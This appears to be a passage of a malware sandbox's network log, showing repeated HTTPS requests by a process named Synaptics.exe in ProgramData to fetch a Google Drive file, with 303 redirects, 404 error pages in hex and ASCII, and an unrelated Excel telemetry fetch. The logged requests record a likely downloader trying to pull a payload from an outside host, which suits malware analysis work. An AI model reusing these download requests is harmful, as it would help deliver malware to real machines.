                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:48 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:48 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 4a 68 46 4d 31 6b 48 44 73 4d 34 37 68 6d 63 66 6a 31 39 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="mJhFM1kHDsM47hmcfj19vA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:48 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            62192.168.2.1649815142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:48 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            63192.168.2.164981613.107.246.454435892C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:48 UTC207OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Accept-Encoding: gzip
                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                            Host: otelrules.azureedge.net
                                                                                                            2024-11-15 10:24:48 UTC517INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 15 Nov 2024 10:24:48 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 2128
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Vary: Accept-Encoding
                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                            ETag: "0x8DC582BA41F3C62"
                                                                                                            x-ms-request-id: 8720efe9-c01e-0082-3dd2-2caf72000000
                                                                                                            x-ms-version: 2018-03-28
                                                                                                            x-azure-ref: 20241115T102448Z-16547b76f7fhvzzthC1DFW5570000000019g000000003ut3
                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                            X-Cache: TCP_HIT
                                                                                                            Accept-Ranges: bytes
                                                                                                            2024-11-15 10:24:48 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            64192.168.2.1649822142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:50 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:50 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-WZB61sqAPRaZ2uf0bVWzAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC4Y-IvMWVFf9aaqAe8mAA624S-jRhspD1IXCscQqxvOfD6snMaNAN4AX5yYwRxmhdf6nSFoCImaRg
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:50 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:50 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 4e 35 4c 36 4e 72 65 75 47 67 75 46 4c 36 56 2d 32 64 4b 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="TN5L6NreuGguFL6V-2dKtQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:50 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            65192.168.2.1649823142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:50 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TpTBmAHIhlBoqcizr3UG6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            66192.168.2.1649824142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:50 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4qW9pLSnSpiaJJwSt6AKjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            67192.168.2.1649827142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:51 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-QUgPZWLQMxwBe7nIsFvHqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            68192.168.2.1649826142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:51 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:51 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6Kb6zbEz4sL8FB2YC-a5gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC7MYxQcydIZKLetSa5-de378R2mvWCCb2-STEDFpICE_wDiN4FsdsfkUyX6gngmNxIK8IasWoWMyg
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:51 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:51 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 66 71 53 4d 68 31 59 70 52 45 78 4e 33 50 57 30 6d 74 47 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="ifqSMh1YpRExN3PW0mtGvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:51 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            69192.168.2.1649828142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:51 UTC1245INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:51 GMT
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-788NdEtxmJRSMa1K8gDteA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC4qTf-Qr1E_o4h5CVpliZNhp93BqEgIkZCFrDGYI11SWM1QJ7lVlfD3WzqM4C9Ya7PulA
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
